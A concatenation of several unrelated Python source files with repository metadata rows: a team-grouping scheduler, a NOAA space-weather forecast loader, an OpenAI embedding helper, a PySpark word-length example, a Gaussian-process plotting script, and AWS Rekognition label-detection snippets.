if oldMember["team"]==teamList[i]:
team[i].append(oldMember)
# arr0.append(oldMember) # team이 MK인 member만 담긴다.
# print("team" + str(i) + " : " + str(team[i]))
teamArr = []
for i in range(0,len(teamList)):
teamArr.append(team[i])
##################################################################################
# 팀에서 랜덤으로 하나씩 뽑기
# teamSearchedResult = list(0 for i in range(0, len(teamList)))
total = 0
while True:
# 섞어주기
random.shuffle(teamArr)
teamSearchedResult = list(0 for i in range(0, len(teamArr)))
# print("teamArr : " + str(teamArr))
# print("teamSearchedResult : " + str(teamSearchedResult))
for i in range(0,len(teamArr)):
if len(teamArr[i]) != 0: # 팀이 멤버가 있다면 뽑아라
ranMember = random.choice(teamArr[i])
newMemberLIst.append(ranMember)
teamArr[i].remove(ranMember)
elif len(teamArr[i]) == 0: # 팀에서 다 뽑았으면
teamSearchedResult[i] = 1
if 0 not in teamSearchedResult:
break
# print("섞은 MemberList : " + str(newMemberLIst))
# newMemberList에서 4명씩 혹은 3명씩 나눠서 일자에 배치해주자
size = len(newMemberLIst) # 18개 그대로 나온다 (-1 안되고 나온다)
calResult = divmod(size, 4)
# print("몫 : " + str(calResult[0]))
# print("나머지 : " + str(calResult[1]))
print("총인원 : " + str(size))
finalOutput = []
output = {"date":[],"person":[]} # key value여야하고
person = [] # 리스트
def saveFinalOutput(localToday, person):
    # Record one scheduled group: appends the date (as YYYY-MM-DD) and the
    # member list into the module-level 'output' dict, then appends that
    # dict to 'finalOutput'.
    # NOTE(review): this relies on the caller rebinding the module-level
    # 'output' to a fresh dict after each call; otherwise successive calls
    # keep mutating the same dict already stored in finalOutput.
    output["date"].append(localToday.strftime("%Y-%m-%d")) #### Type A
    output["person"].append(person)
    finalOutput.append(output)
if calResult[1] == 1:
if calResult[0] == 0: # 나머지 1, 몫 0 인경우 (총인원: 1)
for i in range(size): # 예를들면 size=5, i=0,1,2,3, ...
person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
elif calResult[0] == 1: # 나머지 1, 몫 1 인경우 (총인원: 5)
for i in range(size): # 예를들면 size=5, i=0,1,2,3, ...
person.append(newMemberLIst[i])
if i == size - 3:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 3:
pass
elif calResult[0] == 2: # 나머지 1, 몫 2 인경우 (총인원: 9)
for i in range(size): # 예를들면 17명일때 size=17, i=0,1,2,3, ...
person.append(newMemberLIst[i])
if i == size - 4 or i == size - 7:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
else: # 나머지가 1인 일반적인 경우 (마지막 그룹을 3명,3명,3명 으로 묶는다)
for i in range(size): # 예를들면 17명일때 size=17, i=0,1,2,3, ...
person.append(newMemberLIst[i])
if i == size - 7:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 7:
pass
elif (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif calResult[1] == 2: # 나머지=2
if calResult[0] == 0: # 나머지 2, 몫 0 인경우 (총인원: 2)
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 1:
saveFinalOutput(localToday, person)
elif calResult[0] == 1: # 나머지 2, 몫 1 인경우 (총인원: 6)
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
else: # 나머지가 2인 일반적인 경우 -> 마지막 그룹을 3명, 3명으로 묶는다.
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
elif (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif calResult[1] == 3: # 나머지=3
if calResult[0] == 0: # 나머지 3, 몫 0 인경우 (총인원: 3)
for i in range(size):
person.append(newMemberLIst[i])
if i == size - 1:
saveFinalOutput(localToday, person)
else: # 나머지가 3인 일반적인 경우
for i in range(size): # size : 11 , i=0,1,2,3,4,5,6,7,8,9,10
person.append(newMemberLIst[i])
if i == size - 4:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif i == size - 1:
saveFinalOutput(localToday, person)
elif i > size - 4:
pass
elif (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
elif calResult[1] == 0:
for i in range(size): # size : 11 , i=0,1,2,3,4,5,6,7,8,9,10
person.append(newMemberLIst[i])
if (i + 1) != 1 and ((i + 1) % 4) == 0:
# person.append(newMemberLIst[i])
saveFinalOutput(localToday, person)
person = [] #### B타입
output = {"date": [], "person": []}
# 날짜를 +1 시켜줘야한다.
localToday = holidayCalculateAndPlus(localToday)
print("[결과 - 중복 제거작업 전]")
for finalOutputDetail in finalOutput:
print(finalOutputDetail)
# 한 날짜에 중복된 팀이 있다면, 다음 날짜의 팀원들과 바꿔주기
for i in range(len(finalOutput)):
# print(str(i) + "째날")
list = []
list2 = []
for j in range(len(finalOutput[i]["person"][0])): # i번째날 우정의밥멤버수만큼 반복 -> j번째
# print("dddd" + str(j))
# print(finalOutput[i]["person"][0][j]["team"]) # MK
# print(finalOutput[i]["person"][0]) # [{'name': '바바바', 'team': 'MK'}, {'name': '최상수', 'team': 'MK'}, {'name': '유단비', 'team': 'MK'}]
# print(finalOutput[i]["person"][0][j]) # {'name': '최상수', 'team': 'MK'}
list.append(finalOutput[i]["person"][0][j]["team"])
if ((i+1) != len(finalOutput)): # 마지막 i번째가 아닐때
for z in range(len(finalOutput[i+1]["person"][0])): # i번째날 우정의밥멤버수만큼 반복 -> j번째
list2.append(finalOutput[i+1]["person"][0][z]["team"])
else:
pass
duplicatedMember = {}
q = 0
resultbol = False
while q < len(finalOutput[i]["person"][0]):
# 한날짜에 같은팀이 존재하는지? -> duplicated에 저장
dup = [x for i, x in enumerate(list) if i != list.index(x)] # duplicated에 해당하는 멤버를 아무나 뽑아서, i+1 번째 duplicated에 해당하지 않는 멤버와 바꾼다. (duplicated = 중복된 팀 멤버의 팀이름)
# 다음날짜
dup2 = [x for i, x in enumerate(list2) if i != list2.index(x)] # print("finalOutput[i][person][0][j][team] : " + str(finalOutput[i]["person"][0][j]["team"])) # MK
if dup!=[]:
if finalOutput[i]["person"][0][q]["team"]==dup[0]: # 중복된게 있다면
duplicatedMember = finalOutput[i]["person"][0][q] # duplicated = 팀중복의 멤버에 담고
if dup2 != []: # 다음날짜에도 중복된 인원이 있다면? -> 그 인원을 뽑아서 현재날짜의 중복된 인원과 바꿔준다.
if (i+1) != len(finalOutput):
w = 0
while w < len(finalOutput[i+1]["person"][0]):
# for a in range(len(finalOutput[i+1]["person"][0])): # 그 멤버로 뽑는다.
if finalOutput[i+1]["person"][0][w]["team"] == dup2[0]:
duplicatedMember2 = finalOutput[i+1]["person"][0][w] # duplicated = 팀중복의 멤버
finalOutput[i]["person"][0][q] = duplicatedMember2
finalOutput[i+1]["person"][0][w] = duplicatedMember
resultbol = True
break
w += 1
else: # 다음날짜에도 중복된 인원이 없다면?? -> 그래도 바꿔준다.
w = random.randint(0,len(finalOutput[i + 1]["person"][0]))
duplicatedMember2 = finalOutput[i + 1]["person"][0][w] # duplicated = 팀중복의 멤버 ####### w는 랜덤으로 뽑은 숫자 (finalOutput[i + 1]["person"][0]의 len)
finalOutput[i]["person"][0][q] = duplicatedMember2
finalOutput[i + 1]["person"][0][w] = duplicatedMember
q += 1
if resultbol:
break
if resultbol:
break
print("[최종결과]")
for finalOutputDetail in finalOutput:
print(finalOutputDetail)
# # 예제2) 버튼만들기
# tk = Tk()
# # 함수 정의 (버튼을 누르면 텍스트 내용이 바뀜)
# def event():
# button['text'] = '버튼 누름!'
#
# button = Button(tk,text='버튼입니다. 누르면 함수가 실행됩니다.',command=event)
# button2 = Button(tk,text='버튼2 입니다.')
# button.pack(side=LEFT,padx=10,pady=10) #side로 배치설정, padx로 좌우 여백설정, pady로 상하 여백설정
# button2.pack(side=LEFT, padx=10, pady= 10)
# tk.mainloop()
#
# localToday = localToday.strftime("%Y-%m-%d")
# print(localToday)
# 오늘 날짜부터 가져와야함
| intacka/friendshipRice | main.py | main.py | py | 16,078 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.today",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.today",
"line_number": 18,
"usage_type": "call"
},
{
"api_name":... |
826465711 | """
:Product: three_day_forecast.txt
:Issued: 2012 Dec 12 1235 UTC
# Prepared by the U.S. Dept. of Commerce, NOAA, Space Weather Prediction
Center
#
A. NOAA Geomagnetic Activity Observation and Forecast
The greatest observed 3 hr Kp over the past 24 hours was 1 (below NOAA
Scale levels).
The greatest expected 3 hr Kp for Dec 12-Dec 14 2012 is 3 (below NOAA
Scale levels).
NOAA Kp index breakdown Dec 12-Dec 14 2012
Dec 12 Dec 13 Dec 14
00-03UT 0 2 2
03-06UT 0 1 2
06-09UT 1 1 0
09-12UT 0 1 1
12-15UT 1 1 1
15-18UT 1 1 1
18-21UT 2 3 2
21-00UT 2 3 2
Rationale: Expecting predominately quiet conditions throughout the
forecast period. A chance for unsettled conditions exists late on 13 Dec
as a negative polarity coronal hole/high speed stream becomes
geoeffective. No NOAA scale G1 or greater storms expected.
B. NOAA Solar Radiation Activity Observation and Forecast
Solar radiation, as observed by NOAA GOES-13 over the past 24 hours, was
below S-scale storm level thresholds.
Solar Radiation Storm Forecast for Dec 12-Dec 14 2012
Dec 12 Dec 13 Dec 14
S1 or greater 1% 1% 1%
Rationale: No NOAA scale S1 or greater storms are expected.
C. NOAA Radio Blackout Activity and Forecast
No radio blackouts were observed over the past 24 hours.
Radio Blackout Forecast for Dec 12-Dec 14 2012
Dec 12 Dec 13 Dec 14
R1-R2 1% 1% 1%
R3 or greater 1% 1% 1%
Rationale: No NOAA scale R1 or greater storms are expected.
"""
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import collections
import datetime
import json
import os, sys
import django
urlwithfile = "http://services.swpc.noaa.gov/text/3-day-forecast.txt"
r = requests.get(urlwithfile)
rlines = r.text.split("\n")
adate=rlines[1].split(":")[2].strip()
referencedatetime = datetime.datetime.strptime(adate, '%Y %b %d %H%M %Z')
basedate = datetime.datetime(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day,hour=0,minute=0)
delta3h = datetime.timedelta(hours=3)
delta1d = datetime.timedelta(days=1)
ARationalestart = r.text.find("Rationale",0)
ARationaleend = r.text.find("B",ARationalestart)
BRationalestart = r.text.find("Rationale",ARationaleend)
BRationaleend = r.text.find("C",BRationalestart)
CRationalestart = r.text.find("Rationale",BRationaleend)
CRationaleend = -1
proj_path = "/srv/spaceweather/git/spaceweather/src/spaceweather/"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "spaceweather.settings")
sys.path.append(proj_path)
os.chdir(proj_path)
from core.models import *
# GEOMAGNETIC ACTIVITY
geomagneticdaytimes = []
for line in rlines:
if line.find("UT ") > -1:
geomagneticdaytimes.append(line)
"""
Feb 14 Feb 15 Feb 16
00-03UT 3 5 (G1) 3
03-06UT 3 5 (G1) 4
06-09UT 3 4 3
09-12UT 2 4 3
12-15UT 2 4 2
15-18UT 2 3 2
18-21UT 3 3 1
21-00UT 5 (G1) 2 2
"""
deltanumber = 0
for line in geomagneticdaytimes:
tempvalues = line.split()[1:]
values = []
for v in tempvalues:
try:
int(v)
values.append(v)
except:
pass
for day in range(3):
dt = basedate+(delta1d*day)+(delta3h*deltanumber)
try:
Geomagactivity.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
value = values[day]
g = Geomagactivity(date=dt,value=value,bogus=False)
g.save()
print("Data for {} inserted!".format(dt))
deltanumber+=1
geomagrationale = r.text[ARationalestart:ARationaleend].split("Rationale: ")[1]
# SOLAR RADIATION
basedate = datetime.date(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day)
# R1-R2
solarradiation = ""
for line in rlines:
if line.find("S1 or greater") > -1:
solarradiation = line
break
values = solarradiation.split()[3:]
for day in range(3):
dt = basedate+(delta1d*day)
try:
Solarradiation.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
srt = Solarradiationtype.objects.get(name="S1 or greater")
value = int(values[day][:-1])
s = Solarradiation(date=dt, value=value, solarradiationtype=srt, bogus=False)
s.save()
print("Data for {} inserted!".format(dt))
solarradiationrationale = r.text[BRationalestart:BRationaleend].split("Rationale: ")[1]
# RADIO BLACKOUT
basedate = datetime.date(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day)
radioblackout = ""
for line in rlines:
if line.find("R1-R2") > -1:
radioblackout = line
break
if len(radioblackout) > 0:
values = radioblackout.split()[1:]
for day in range(3):
dt = basedate+(delta1d*day)
try:
Radioblackout.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
rbt = Radioblackouttype.objects.get(name="R1-R2")
value = int(values[day][:-1])
rb = Radioblackout(date=dt, value=value, radioblackouttype=rbt, bogus=False)
rb.save()
print("Data for {} inserted!".format(dt))
radioblackout = ""
for line in rlines:
if line.find("R3 or greater") > -1:
radioblackout = line
break
if len(radioblackout) > 0:
values = radioblackout.split()[1:]
for day in range(3):
dt = basedate+(delta1d*day)
try:
Radioblackout.objects.get(date=dt)
print("Data for {} already there!".format(dt))
except:
rbt = Radioblackouttype.objects.get(name="R3 or greater")
value = int(values[day][:-1])
rb = Radioblackout(date=dt, value=value, radioblackouttype=rbt, bogus=False)
rb.save()
print("Data for {} inserted!".format(dt))
radioblackoutrationale = r.text[CRationalestart:CRationaleend].split("Rationale: ")[1]
# FORECAST RATIONALE
basedate = datetime.datetime(year=referencedatetime.year,month=referencedatetime.month,day=referencedatetime.day,hour=0,minute=0)
try:
Forecastrationale.objects.get(date=basedate)
print("Data for {} already there!".format(basedate))
except:
fr = Forecastrationale(date=basedate, radioblackout=radioblackoutrationale, solarradiation=solarradiationrationale, geomagactivity=geomagrationale)
fr.save()
print("Data for {} inserted!".format(dt))
| diacritica/spaceweather | misc/scripts/load3dayforecast.py | load3dayforecast.py | py | 6,924 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "dateti... |
38834210088 | import hashlib
import os
import time
import jsonlines
import openai
import tiktoken
import json
import tqdm
import numpy as np
from numpy.linalg import norm
from pathlib import Path
from .utils import SaveUtils
from .ai_openai import OpenAI
class OpenAIEmbedding:
    """Chunk/summarize/embed long texts via OpenAI and answer questions
    against the stored embeddings.

    NOTE(review): several methods reference names that do not exist in
    this file (`tokenizer`, `self.get_question`, `self.store_info`); see
    the per-method notes below.  The `openAI` client is a shared class
    attribute, so all instances use the same client object.
    """
    openAI = OpenAI()

    def __init__(self):
        pass

    def getSummary(self, chunk):
        # Ask the chat model for a summary of one passage fragment.
        content = "The following is a passage fragment. Please summarize what information the readers can take away from it:"
        content += "\n" + chunk
        messages = [
            {"role": "user", "content": content}
        ]
        # _chatMessages appears to return a sequence; [0] is the first reply.
        summary = self.openAI._chatMessages(messages)[0]
        return summary

    def getInfo(self, info, text, chunk_sz = 700, max_memory = 100):
        """Split *text* into chunk_sz-word chunks; append an embedding record
        per chunk to *info* (mutated in place) and return the summaries."""
        # Rebinds the parameter: 'text' becomes a list of words.
        text = text.replace("\n", " ").split()
        print(f'Text: {text}')
        # raise error if the anticipated api usage is too massive
        if (len(text) / chunk_sz) >= max_memory:
            raise ValueError("Processing is aborted due to high anticipated costs.")
        summaries = []
        # NOTE(review): 'import tqdm' imports the MODULE, so tqdm(...) here
        # raises TypeError; this should be tqdm.tqdm(...).
        for idx in tqdm(range(0, len(text), chunk_sz)):
            chunk = " ".join(text[idx: idx + chunk_sz])
            checkSize = OpenAI.getTokenUsage(chunk)
            if checkSize > chunk_sz * 3:
                print(f"Skipped an uninformative chunk {checkSize}. {chunk}")
                a = input("Continue ? ")
                if a != '':
                    # NOTE(review): bare 'raise' outside an except block
                    # raises RuntimeError, not a meaningful error.
                    raise
            attempts = 0
            # Retry each chunk up to 3 times before giving up.
            while True:
                try:
                    summary = self.getSummary(chunk)
                    embd = self.openAI._embedding(chunk)
                    summary_embd = self.openAI._embedding(summary)
                    item = {
                        "id": len(info),
                        "text": chunk,
                        "embd": embd,
                        "summary": summary,
                        "summary_embd": summary_embd,
                    }
                    info.append(item)
                    time.sleep(3)  # up to 20 api calls per min
                    summaries.append(summary)
                    break
                except Exception as e:
                    attempts += 1
                    if attempts >= 3:
                        raise Exception(f"{str(e)}")
                    time.sleep(3)
        return summaries

    def storeInfo(self, text, chunk_sz = 700, max_memory = 100):
        pass

    def storeInfo_(self, text, memory_path, chunk_sz = 700, max_memory = 100):
        pass

    def load_info(self, memory_path):
        pass
{
"api_name": "ai_openai.OpenAI",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ai_openai.OpenAI.getTokenUsage",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "ai_openai.OpenAI",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "time... |
15807172488 | # --------------------------------------------------------
# PYTHON PROGRAM
# Here is where we are going to define our set of...
# - Imports
# - Global Variables
# - Functions
# ...to achieve the functionality required.
# When executing > python 'this_file'.py in a terminal,
# the Python interpreter will load our program,
# but it will execute nothing yet.
# --------------------------------------------------------
import pyspark
import shutil
import os
# ------------------------------------------
# FUNCTION process_line
# ------------------------------------------
def process_line(line, bad_chars):
# 1. We create the output variable
res = []
# 2. We clean the line by removing the bad characters
for c in bad_chars:
line = line.replace(c, '')
# 3. We clean the line by removing each tabulator and set of white spaces
line = line.replace('\t', ' ')
line = line.replace(' ', ' ')
line = line.replace(' ', ' ')
line = line.replace(' ', ' ')
# 4. We clean the line by removing any initial and final white spaces
line = line.strip()
line = line.rstrip()
# 5. We split the line by words
words = line.split(" ")
# 6. We append each valid word to the list
for word in words:
if (word != ''):
if ((ord(word[0]) > 57) or (ord(word[0]) < 48)):
res.append(word)
# 7. We return res
return res
# ------------------------------------------
# FUNCTION process_word
# ------------------------------------------
def process_word(word):
# 1. We create the output variable
res = ()
# 2. We create a couple of extra variables
val1 = word[0].lower()
val2 = len(word)
# 3. We assign res properly
res = (val1, val2)
# 4. We return res
return res
# ------------------------------------------
# FUNCTION my_main
# ------------------------------------------
def my_main(sc, my_dataset_dir, my_result_dir, bad_chars):
    """Compute the average word length per initial letter with Spark Core.

    Pipeline:
        dataset --textFile--> lines --flatMap--> words
                --map--> (letter, length)
                --combineByKey--> (letter, (total_length, num_words))
                --mapValues--> (letter, average)
                --saveAsTextFile--> result folder

    :param sc: the SparkContext used to create and run the RDDs.
    :param my_dataset_dir: folder whose text files are read line by line.
    :param my_result_dir: output folder for the solution RDD.
    :param bad_chars: characters stripped from each line before splitting.
    """
    # C1. Creation: one RDD item (a String) per line of every file in the
    #     dataset folder; content is distributed across the cluster.
    inputRDD = sc.textFile(my_dataset_dir)
    # T1. flatMap (not map) flattens the per-line word lists into a single
    #     RDD of words. The lambda forwards the extra bad_chars argument
    #     to process_line.
    allWordsRDD = inputRDD.flatMap(lambda x: process_line(x, bad_chars))
    # T2. Keep only what we need per word: (first letter, word length),
    #     giving us (key, value) pairs to aggregate on.
    pairWordsRDD = allWordsRDD.map(process_word)
    # T3. combineByKey aggregates per letter into (sum_of_lengths, count):
    #     - 1st fn: builds the accumulator from the first value of a key
    #       seen on a partition,
    #     - 2nd fn: folds each further value into that partition's
    #       accumulator,
    #     - 3rd fn: merges the per-partition accumulators into one.
    letterTotalInfoRDD = pairWordsRDD.combineByKey(lambda x: (x, 1),
                                                   lambda x, y: (x[0] + y, x[1] + 1),
                                                   lambda x, y: (x[0] + y[0], x[1] + y[1])
                                                   )
    # T4. mapValues keeps the key (the letter) and turns the accumulator
    #     into the average word length; * 1.0 forces float division.
    solutionRDD = letterTotalInfoRDD.mapValues(lambda value: (value[0] * 1.0) / (value[1] * 1.0))
    # S1. Each partition writes a part-XXXXX file into the result folder;
    #     a _SUCCESS marker is created when the whole write completes.
    solutionRDD.saveAsTextFile(my_result_dir)
    # Debug aid: uncomment to print a sample of the solution RDD.
    # for item in solutionRDD.take(10):
    #     print(item)
# ---------------------------------------------------------------
# PYTHON EXECUTION
# This is the main entry point to the execution of our program.
# It provides a call to the 'main function' defined in our
# Python program, making the Python interpreter to trigger
# its execution.
# ---------------------------------------------------------------
if __name__ == '__main__':
    # 1. Characters to strip from every line before splitting into words.
    bad_chars = ['?', '!', '.', ',', ';', '_', '-', '\'', '|', '--', '(', ')', '[', ']', '{', '}', ':', '&', '\n']
    # 2. Execution mode: False -> local machine, True -> Databricks.
    local_False_databricks_True = False
    # 3. Resolve dataset and result folders against the right root, and
    #    remove any previous result folder so saveAsTextFile does not
    #    fail because the destination already exists.
    my_local_path = "/home/nacho/CIT/Tools/MyCode/Spark/"
    my_databricks_path = "/"
    my_dataset_dir = "FileStore/tables/1_Spark_Core/my_dataset/"
    my_result_dir = "FileStore/tables/1_Spark_Core/my_result"
    # Use `not flag` instead of the non-idiomatic `flag == False`, and
    # fold the previously duplicated mode check into a single branch.
    if not local_False_databricks_True:
        my_dataset_dir = my_local_path + my_dataset_dir
        my_result_dir = my_local_path + my_result_dir
        if os.path.exists(my_result_dir):
            shutil.rmtree(my_result_dir)
    else:
        my_dataset_dir = my_databricks_path + my_dataset_dir
        my_result_dir = my_databricks_path + my_result_dir
        # dbutils is only defined inside a Databricks runtime.
        dbutils.fs.rm(my_result_dir, True)
    # 4. Configure the Spark context; WARN keeps the console readable.
    sc = pyspark.SparkContext.getOrCreate()
    sc.setLogLevel('WARN')
    print("\n\n\n")
    # 5. Run the job.
    my_main(sc, my_dataset_dir, my_result_dir, bad_chars)
| segunar/BIG_data_sample_code | Spark/Workspace/1_Spark_Core/6_Text_File_Examples/24_average_length_of_words.py | 24_average_length_of_words.py | py | 13,654 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 253,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 253,
"usage_type": "attribute"
},
{
"api_name": "shutil.rmtree",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "pyspark.SparkContext.get... |
44550764149 | from source.core.visualiser import Visualiser
# Fetch some GP models
from agents.example_agents import agents
# Unobserve the points from some GPs
i = 8
agents[i].unobserve_true_points(x=agents[i].x_seen)
agents[i].kappa = 3 # Higher regard for uncertainty works better for toy problem
# Initialise visualiser class
visualiser = Visualiser()
num = 0
# Plot single static GP with all elements
# visualiser.plot_gps_matplotlib(agents[num:num+2], savefig=True)
# # Plot multiple static GPs with some plot elements removed
# visualiser.plot_gps_matplotlib(agents[8:10], plot_elements=["mean", "observed", "var"])
# Start an interactive example app (make sure to give the input as agents[12:13] even just for 1 agent)
# visualiser.visualise_gps_plotly(agents[9:10], plot_elements=["true", "mean", "var", "observed", "acquisition"])
# Start an interactive ITE app (try i = 8 above)
# visualiser.visualise_ite_plotly(agents[i])
# Start an interactive GPCF app (try inputting agents[9:] and include "var" in plot_elements param)
# visualiser.visualise_gpcf_plotly(agents[9:], plot_elements=["mean", "observed"])
# Start an interactive inHERA app
# visualiser.visualise_inhera_plotly(agents[9:], plot_elements=["mean", "observed"])
# # Plot GPs with different elements to plot
import matplotlib.pyplot as plt
import matplotlib.font_manager as fm
import numpy as np
plt.style.use("seaborn")
fig, ax = plt.subplots()
# visualiser.update_gps_axes_matplotlib(ax=ax,
# gps_arr=agents[18:19],
# plot_elements=["true", "mean", "observed", "acquisition", "prior",])
#
# visualiser.update_gps_axes_matplotlib(ax=ax,
# gps_arr=agents[19:20],
# plot_elements=["mean",],
# alpha=0.6,
# color="seagreen")
#
# visualiser.update_gps_axes_matplotlib(ax=ax,
# gps_arr=agents[20:21],
# plot_elements=["mean",],
# alpha=0.6,
# color="salmon")
# Manually update the inHERA prior mean function:
from core.gaussian_process import GaussianProcess
gp0 = GaussianProcess(true_func=lambda x: np.sin(0.6 * (x - 5)) + 3 - 1.5 / (x + 0.5),
mu_0=lambda x: 0.7 * (np.sin(0.6 * (x - 5)) + 3) + 0.3 * (-1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x),
x_seen=[1.4])
# 19 Methods/inHERA for report - ANCESTOR 1
gp1 = GaussianProcess(true_func=lambda x: np.sin(0.6 * (x - 5)) + 3,
mu_0=lambda x: np.sin(0.6 * (x - 5)) + 3,
x_seen=[1.5, 7.8])
# 20 Methods/inHERA for report - ANCESTOR 2
gp2 = GaussianProcess(true_func=lambda x: -1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x,
mu_0=lambda x: -1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x,
x_seen=[4])
xplot = gp0.x_problem
a1_mu = gp1.mu_new(xplot)
a1_var = gp1.var_new(xplot)
a2_mu = gp2.mu_new(xplot)
a2_var = gp2.var_new(xplot)
a_vars = np.array([a1_var, a2_var]).T
a_mus = np.array([a1_mu, a2_mu]).T
sim_var = np.full(shape=a_mus.shape, fill_value=1.001)
sim_prior = gp0.mu_0(xplot)
W = np.array([0.7, 0.3])
repeated_sim_mu = np.repeat(a=np.expand_dims(a=sim_prior, axis=1), repeats=2, axis=1)
new_prior = sim_prior + (sim_var - a_vars) * (a_mus - repeated_sim_mu) @ W
gp3 = GaussianProcess(true_func=lambda x: np.sin(0.6 * (x - 5)) + 3 - 1.5 / (x + 0.5),
mu_0=lambda x: 0.7 * (np.sin(0.6 * (x - 5)) + 3) + 0.3 * (-1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x),
x_seen=[1.4])
visualiser.update_gps_axes_matplotlib(ax=ax,
gps_arr=[gp3,])
# family_ancestors_mus =
# print(sim_prior_mean.shape)
# sim_var = np.full(shape=self.family.ancestor_mus.T.shape, fill_value=initial_uncertainty)
# Only change these two lines
font_used = "Charter"
font_size = 21
font = {'fontname': font_used}
legend_font = fm.FontProperties(family=font_used)
legend_font._size = font_size
ax.set_ylim(0, 5)
ax.set_xlim(0, 10)
ax.set_xlabel("Behavioural descriptor", fontsize=font_size, **font)
ax.set_ylabel("Fitness", fontsize=font_size, **font)
ax.tick_params(axis='x', labelsize=15)
ax.tick_params(axis='y', labelsize=15)
# ax.legend(prop=legend_font,)
fig.savefig("my-plot.png", dpi=600)
plt.show()
| mgm21/GPs-visualised | source/main.py | main.py | py | 4,443 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "agents.example_agents.agents",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "agents.example_agents.agents",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "source.core.visualiser.Visualiser",
"line_number": 12,
"usage_type": "call"
},
... |
23949329045 | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 4 15:28:32 2019
@author: abhinav.jhanwar
"""
import boto3
# from s3 bucket
# Detect labels for an image already stored in an S3 bucket (the image is
# referenced by bucket/key, not uploaded).
if __name__=="__main__":
    # Object key and bucket holding the image to analyse.
    filename="farmer-looks-mountain-view.jpg"
    bucket="bucket"
    # Rekognition client; credentials/region come from the boto3 config.
    client=boto3.client('rekognition')
    response = client.detect_labels(Image={'S3Object':
            {'Bucket':bucket, 'Name':filename}})
    print('Detected labels for ' + filename)
    # Each detected label carries a name and a confidence percentage.
    for label in response['Labels']:
        print(label['Name'] + ' : '+str(label['Confidence']))
# from local
# Detect labels for a local image file by sending the raw bytes.
# NOTE: boto3 is re-imported here in the original source; kept as-is since
# only part of the file may be visible.
import boto3
if __name__ == "__main__":
    imageFile='Image1.jpg'
    client=boto3.client('rekognition')
    # image should be base64-encoded string
    # NOTE(review): boto3 accepts the raw JPEG bytes here and handles any
    # encoding itself — the comment above predates that; verify against
    # the boto3 detect_labels docs.
    with open(imageFile, 'rb') as image:
        response = client.detect_labels(Image={'Bytes': image.read()})
